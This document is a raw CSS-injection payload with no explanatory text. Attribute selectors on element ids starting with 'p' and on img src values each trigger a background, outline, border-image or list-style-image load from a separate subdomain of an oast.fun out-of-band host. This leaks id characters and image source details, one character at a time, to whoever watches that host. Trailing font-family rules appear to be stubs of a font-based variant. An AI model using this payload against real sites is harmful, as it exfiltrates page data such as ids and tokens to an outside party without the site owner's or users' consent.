[id^="pa"] { background-image: url("http://id2-61.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pb"] { background-image: url("http://id2-62.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pc"] { background-image: url("http://id2-63.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pd"] { background-image: url("http://id2-64.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pe"] { background-image: url("http://id2-65.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pf"] { background-image: url("http://id2-66.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pg"] { background-image: url("http://id2-67.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="ph"] { background-image: url("http://id2-68.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pi"] { background-image: url("http://id2-69.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pj"] { background-image: url("http://id2-6a.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pk"] { background-image: url("http://id2-6b.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pl"] { background-image: url("http://id2-6c.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pm"] { background-image: url("http://id2-6d.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pn"] { background-image: url("http://id2-6e.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="po"] { background-image: url("http://id2-6f.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pp"] { background-image: url("http://id2-70.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pq"] { background-image: url("http://id2-71.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pr"] { background-image: url("http://id2-72.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="ps"] { background-image: url("http://id2-73.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pt"] { background-image: url("http://id2-74.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pu"] { background-image: url("http://id2-75.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pv"] { background-image: url("http://id2-76.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pw"] { background-image: url("http://id2-77.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="px"] { background-image: url("http://id2-78.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="py"] { background-image: url("http://id2-79.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pz"] { background-image: url("http://id2-7a.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p0"] { background-image: url("http://id2-30.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p1"] { background-image: url("http://id2-31.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p2"] { background-image: url("http://id2-32.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p3"] { background-image: url("http://id2-33.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p4"] { background-image: url("http://id2-34.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p5"] { background-image: url("http://id2-35.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p6"] { background-image: url("http://id2-36.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p7"] { background-image: url("http://id2-37.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p8"] { background-image: url("http://id2-38.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p9"] { background-image: url("http://id2-39.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p-"] { background-image: url("http://id2-2d.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="p_"] { background-image: url("http://id2-5f.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pA"] { background-image: url("http://id2-41.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pB"] { background-image: url("http://id2-42.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pC"] { background-image: url("http://id2-43.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pD"] { background-image: url("http://id2-44.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pE"] { background-image: url("http://id2-45.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pF"] { background-image: url("http://id2-46.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pG"] { background-image: url("http://id2-47.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pH"] { background-image: url("http://id2-48.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pI"] { background-image: url("http://id2-49.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pJ"] { background-image: url("http://id2-4a.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pK"] { background-image: url("http://id2-4b.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pL"] { background-image: url("http://id2-4c.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pM"] { background-image: url("http://id2-4d.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pN"] { background-image: url("http://id2-4e.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pO"] { background-image: url("http://id2-4f.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pP"] { background-image: url("http://id2-50.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pQ"] { background-image: url("http://id2-51.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pR"] { background-image: url("http://id2-52.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pS"] { background-image: url("http://id2-53.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pT"] { background-image: url("http://id2-54.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pU"] { background-image: url("http://id2-55.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pV"] { background-image: url("http://id2-56.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pW"] { background-image: url("http://id2-57.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pX"] { background-image: url("http://id2-58.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pY"] { background-image: url("http://id2-59.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id^="pZ"] { background-image: url("http://id2-5a.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img[src^="http"] { outline: url("http://src-http.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="data:"] { outline: url("http://src-datac.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="/"] { outline: url("http://src-s.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="static"] { outline: url("http://src-static.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="blob:"] { outline: url("http://src-blobc.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="file:"] { outline: url("http://src-filec.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") solid; }
img[src^="http://alive"] { border-image: url("http://src-ours.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img[src^="http://web"] { border-image: url("http://src-web.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img[src^="/"] { border-image: url("http://src-rel.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img[src^="static"] { border-image: url("http://src-static.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img:first-of-type { list-style-image: url("http://img1st.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img:last-of-type { list-style-image: url("http://imglast.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
img:nth-of-type(2) { outline-offset: 0; background: url("http://img2nd.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
code { font-family: x30; }
code { font-family: x31; }
code { font-family: x32; }
code { font-family: x33; }
code { font-family: x34; }
code { font-family: x35; }
code { font-family: x36; }
code { font-family: x37; }
code { font-family: x38; }
code { font-family: x39; }
code { font-family: x61; }
code { font-family: x62; }
code { font-family: x63; }
code { font-family: x64; }
code { font-family: x65; }
code { font-family: x66; }
